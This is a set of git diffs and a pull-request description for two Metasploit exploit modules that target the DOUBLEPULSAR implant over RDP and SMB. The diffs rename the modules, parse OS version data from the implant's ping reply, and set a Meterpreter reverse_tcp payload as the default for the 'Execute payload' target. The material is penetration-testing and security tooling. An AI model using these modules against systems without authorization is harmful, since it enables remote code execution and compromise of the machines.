-        'wvu'             # RDP DOPU analysis and module
+        'Equation Group',  # DOUBLEPULSAR implant
+        'Shadow Brokers',  # Equation Group dump
+        'Luke Jennings',   # DOPU analysis and detection
+        'wvu',             # RDP DOPU analysis and module
+        'Tom Sellers',     # RDP DOPU analysis
+        'Spencer McIntyre' # RDP DOPU analysis
       ],
       'References'       => [
         ['URL', 'https://github.com/countercept/doublepulsar-detection-script']

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Notes'            => {
         'AKA'            => ['DOUBLEPULSAR'],
-        'RelatedModules' => ['exploit/windows/smb/doublepulsar_rce'],
+        'RelatedModules' => ['exploit/windows/smb/smb_doublepulsar_rce'],
         'Stability'      => [CRASH_OS_DOWN],
         'Reliability'    => [REPEATABLE_SESSION]
       }

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -106,16 +106,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    vprint_status('Sending ping to DOUBLEPULSAR')
+    print_status('Sending ping to DOUBLEPULSAR')
     res = do_rdp_doublepulsar_pkt(OPCODES[:ping])
 
     unless (info = parse_doublepulsar_ping(res))
-      vprint_error('DOUBLEPULSAR not detected or disabled')
+      print_error('DOUBLEPULSAR not detected or disabled')
       return CheckCode::Safe
     end
 
-    vprint_good('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')
-    vprint_good("Target is #{info}")
+    print_warning('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')
+    print_good("Target is #{info}")
     CheckCode::Vulnerable
   end
 

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -73,11 +73,32 @@ class MetasploitModule < Msf::Exploit::Remote
   def parse_doublepulsar_ping(res)
     return unless res && res.length == 288
 
-    magic, _, major, minor, build, arch = res.unpack('V6')
+    # https://www.gaijin.at/en/infos/windows-version-numbers
+    magic, _, major, minor, build = res.unpack('V5')
+    sp, product, arch = res[-3..-1].unpack('C3')
 
     return unless magic == DOUBLEPULSAR_MAGIC
 
-    "Windows #{major}.#{minor}.#{build} #{arch == 2 ? 'x64' : 'x86'}"
+    # http://www.nogeekleftbehind.com/2013/09/10/updated-list-of-os-version-queries-for-wmi-filters/
+    product_str =
+      case product
+      when 1
+        'Desktop'
+      when 2
+        'Server (DC)'
+      when 3
+        'Server'
+      end
+
+    arch_str =
+      case arch
+      when 1
+        'x86'
+      when 2
+        'x64'
+      end
+
+    "Windows #{product_str} #{major}.#{minor}.#{build} SP#{sp} #{arch_str}"
   end
 
   def setup

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -70,22 +70,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   DOUBLEPULSAR_MAGIC = 0x19283744
 
+  # https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw
   def parse_doublepulsar_ping(res)
     return unless res && res.length == 288
 
-    # https://www.gaijin.at/en/infos/windows-version-numbers
-    magic, _, major, minor, build = res.unpack('V5')
-    sp, _, _, product, arch = res[-8..-1].unpack('VC4')
+    magic, _size, major, minor, build = res.unpack('V5')
+    sp_major, _sp_minor, _suites, product, arch = res[-8..-1].unpack('v3C2')
 
     return unless magic == DOUBLEPULSAR_MAGIC
 
-    # http://www.nogeekleftbehind.com/2013/09/10/updated-list-of-os-version-queries-for-wmi-filters/
     product_str =
       case product
       when 1
-        'Desktop'
+        'Workstation'
       when 2
-        'Server (DC)'
+        'Domain Controller'
       when 3
         'Server'
       end
@@ -98,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'x64'
       end
 
-    "Windows #{product_str} #{major}.#{minor}.#{build} SP#{sp} #{arch_str}"
+    "Windows #{product_str} #{major}.#{minor}.#{build} SP#{sp_major} #{arch_str}"
   end
 
   def setup

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -74,13 +74,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def parse_doublepulsar_ping(res)
     return unless res && res.length == 288
 
-    magic, _size, major, minor, build = res.unpack('V5')
-    sp_major, _sp_minor, _suites, product, arch = res[-8..-1].unpack('v3C2')
+    magic,    _size,     major,   minor, build = res.unpack('V5')
+    sp_major, _sp_minor, _suites, prod,  arch  = res[-8..-1].unpack('v3C2')
 
     return unless magic == DOUBLEPULSAR_MAGIC
 
-    product_str =
-      case product
+    ver_str = "#{major}.#{minor}.#{build}"
+    sp_str  = "SP#{sp_major}"
+
+    prod_str =
+      case prod
       when 1
         'Workstation'
       when 2
@@ -97,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'x64'
       end
 
-    "Windows #{product_str} #{major}.#{minor}.#{build} SP#{sp_major} #{arch_str}"
+    "Windows #{prod_str} #{ver_str} #{sp_str} #{arch_str}"
   end
 
   def setup

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -13,15 +13,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'             => 'RDP DOUBLEPULSAR Remote Code Execution',
-      'Description'      => %q{
+      'Name'               => 'RDP DOUBLEPULSAR Remote Code Execution',
+      'Description'        => %q{
         This module executes a Metasploit payload against the Equation Group's
         DOUBLEPULSAR implant for RDP.
 
         While this module primarily performs code execution against the implant,
         the "Neutralize implant" target allows you to disable the implant.
       },
-      'Author'           => [
+      'Author'             => [
         'Equation Group',  # DOUBLEPULSAR implant
         'Shadow Brokers',  # Equation Group dump
         'Luke Jennings',   # DOPU analysis and detection
@@ -29,32 +29,37 @@ class MetasploitModule < Msf::Exploit::Remote
         'Tom Sellers',     # RDP DOPU analysis
         'Spencer McIntyre' # RDP DOPU analysis
       ],
-      'References'       => [
+      'References'         => [
         ['URL', 'https://github.com/countercept/doublepulsar-detection-script']
       ],
-      'DisclosureDate'   => '2017-04-14', # Shadow Brokers leak
-      'License'          => MSF_LICENSE,
-      'Platform'         => 'win',
-      'Arch'             => ARCH_X64,
-      'Privileged'       => true,
-      'Payload'          => {
-        'Space'          => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
-        'DisableNops'    => true
+      'DisclosureDate'     => '2017-04-14', # Shadow Brokers leak
+      'License'            => MSF_LICENSE,
+      'Platform'           => 'win',
+      'Arch'               => ARCH_X64,
+      'Privileged'         => true,
+      'Payload'            => {
+        'Space'            => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
+        'DisableNops'      => true
       },
-      'Targets'          => [
-        ['Execute payload',    {}],
-        ['Neutralize implant', {}]
+      'Targets'            => [
+        ['Execute payload',
+          'DefaultOptions' => {
+            'EXITFUNC'     => 'thread',
+            'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Neutralize implant',
+          'DefaultOptions' => {
+            'PAYLOAD'      => nil # XXX: "Unset" generic payload
+          }
+        ]
       ],
-      'DefaultTarget'    => 0,
-      'DefaultOptions'   => {
-        'EXITFUNC'       => 'thread',
-        'PAYLOAD'        => 'windows/x64/meterpreter/reverse_tcp'
-      },
-      'Notes'            => {
-        'AKA'            => ['DOUBLEPULSAR'],
-        'RelatedModules' => ['exploit/windows/smb/smb_doublepulsar_rce'],
-        'Stability'      => [CRASH_OS_DOWN],
-        'Reliability'    => [REPEATABLE_SESSION]
+      'DefaultTarget'      => 0,
+      'Notes'              => {
+        'AKA'              => ['DOUBLEPULSAR'],
+        'RelatedModules'   => ['exploit/windows/smb/smb_doublepulsar_rce'],
+        'Stability'        => [CRASH_OS_DOWN],
+        'Reliability'      => [REPEATABLE_SESSION]
       }
     ))
 

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisableNops'      => true
       },
       'Targets'            => [
-        ['Execute payload',
+        ['Execute payload (x64)',
           'DefaultOptions' => {
             'EXITFUNC'     => 'thread',
             'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
@@ -169,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
-    when 'Execute payload'
+    when 'Execute payload (x64)'
       print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
       shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
       shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)

--- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
+++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisableNops'      => true
       },
       'Targets'            => [
-        ['Execute payload',
+        ['Execute payload (x64)',
           'DefaultOptions' => {
             'EXITFUNC'     => 'thread',
             'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
@@ -184,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
-    when 'Execute payload'
+    when 'Execute payload (x64)'
       unless @xor_key
         fail_with(Failure::NotFound, 'XOR key not found')
       end

--- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
+++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
@@ -16,15 +16,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'             => 'DOUBLEPULSAR Payload Execution and Neutralization',
-      'Description'      => %q{
+      'Name'               => 'DOUBLEPULSAR Payload Execution and Neutralization',
+      'Description'        => %q{
         This module executes a Metasploit payload against the Equation Group's
         DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.
 
         While this module primarily performs code execution against the implant,
         the "Neutralize implant" target allows you to disable the implant.
       },
-      'Author'           => [
+      'Author'             => [
         'Equation Group', # DOUBLEPULSAR implant
         'Shadow Brokers', # Equation Group dump
         'zerosum0x0',     # DOPU analysis and detection
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'wvu',            # Metasploit module and arch detection
         'Jacob Robles'    # Metasploit module and RCE help
       ],
-      'References'       => [
+      'References'         => [
         ['MSB', 'MS17-010'],
         ['CVE', '2017-0143'],
         ['CVE', '2017-0144'],
@@ -47,32 +47,37 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
         ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
       ],
-      'DisclosureDate'   => '2017-04-14', # Shadow Brokers leak
-      'License'          => MSF_LICENSE,
-      'Platform'         => 'win',
-      'Arch'             => ARCH_X64,
-      'Privileged'       => true,
-      'Payload'          => {
-        'Space'          => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
-        'DisableNops'    => true
+      'DisclosureDate'     => '2017-04-14', # Shadow Brokers leak
+      'License'            => MSF_LICENSE,
+      'Platform'           => 'win',
+      'Arch'               => ARCH_X64,
+      'Privileged'         => true,
+      'Payload'            => {
+        'Space'            => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
+        'DisableNops'      => true
       },
-      'Targets'          => [
-        ['Execute payload',    {}],
-        ['Neutralize implant', {}]
+      'Targets'            => [
+        ['Execute payload',
+          'DefaultOptions' => {
+            'EXITFUNC'     => 'thread',
+            'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Neutralize implant',
+          'DefaultOptions' => {
+            'PAYLOAD'      => nil # XXX: "Unset" generic payload
+          }
+        ]
       ],
-      'DefaultTarget'    => 0,
-      'DefaultOptions'   => {
-        'EXITFUNC'       => 'thread',
-        'PAYLOAD'        => 'windows/x64/meterpreter/reverse_tcp'
-      },
-      'Notes'            => {
-        'AKA'            => ['DOUBLEPULSAR'],
-        'RelatedModules' => [
+      'DefaultTarget'      => 0,
+      'Notes'              => {
+        'AKA'              => ['DOUBLEPULSAR'],
+        'RelatedModules'   => [
           'auxiliary/scanner/smb/smb_ms17_010',
           'exploit/windows/smb/ms17_010_eternalblue'
         ],
-        'Stability'      => [CRASH_OS_DOWN],
-        'Reliability'    => [REPEATABLE_SESSION]
+        'Stability'        => [CRASH_OS_DOWN],
+        'Reliability'      => [REPEATABLE_SESSION]
       }
     ))
 

--- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
+++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
@@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::SMB::Client
+  include Msf::Module::Deprecated
+
+  moved_from 'exploit/windows/smb/doublepulsar_rce'
 
   MAX_SHELLCODE_SIZE = 4096
 

--- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
+++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'               => 'DOUBLEPULSAR Payload Execution and Neutralization',
+      'Name'               => 'SMB DOUBLEPULSAR Remote Code Execution',
       'Description'        => %q{
         This module executes a Metasploit payload against the Equation Group's
         DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.


### PR DESCRIPTION
Future to-do: update kernel shellcode mixin to incorporate the various shellcode we've acquired.

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > info

       Name: RDP DOUBLEPULSAR Remote Code Execution
     Module: exploit/windows/rdp/rdp_doublepulsar_rce
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2017-04-14

Provided by:
  Equation Group
  Shadow Brokers
  Luke Jennings
  wvu <wvu@metasploit.com>
  Tom Sellers
  Spencer McIntyre

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Execute payload (x64)
  1   Neutralize implant

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
  RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
  RDP_DOMAIN                        no        The client domain name to report during connect
  RDP_USER                          no        The username to report during connect, UNSET = random
  RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT            3389             yes       The target port (TCP)

Payload information:
  Space: 3316

Description:
  This module executes a Metasploit payload against the Equation
  Group's DOUBLEPULSAR implant for RDP. While this module primarily
  performs code execution against the implant, the "Neutralize
  implant" target allows you to disable the implant.

References:
  https://github.com/countercept/doublepulsar-detection-script

Also known as:
  DOUBLEPULSAR

Related modules:
  exploit/windows/smb/smb_doublepulsar_rce

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```

#12374